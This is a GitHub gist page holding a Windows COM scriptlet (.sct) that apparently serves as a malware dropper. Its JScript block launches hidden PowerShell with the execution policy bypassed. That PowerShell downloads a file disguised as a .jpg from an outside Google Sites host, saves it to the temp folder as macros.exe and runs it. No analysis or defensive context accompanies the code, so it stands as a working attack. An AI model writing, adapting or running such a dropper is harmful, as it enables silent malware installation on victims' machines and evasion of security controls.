Last active
September 1, 2017 22:33
-
-
Save Elm0D/d9a6e45d3d2a5eb35a1dd8ef4f204ec6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="FofX" | |
| progid="FofX" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var EGu = new ActiveXObject("WScript.Shell"); | |
| var WszDO = "$down = New-Object System.Net.WebClient;$url = 'https://sites.google.com/site/elm0d4upload/documents/VB6%20TestMsgBox.jpg?attredirects=0&d=1';$file = '%TMP%\\macros.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);exit;"; | |
| var zH = 'powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command '; | |
| EGu.Exec(zH + WszDO); | |
| ]]> | |
| </script> | |
| </registration> | |
| </scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment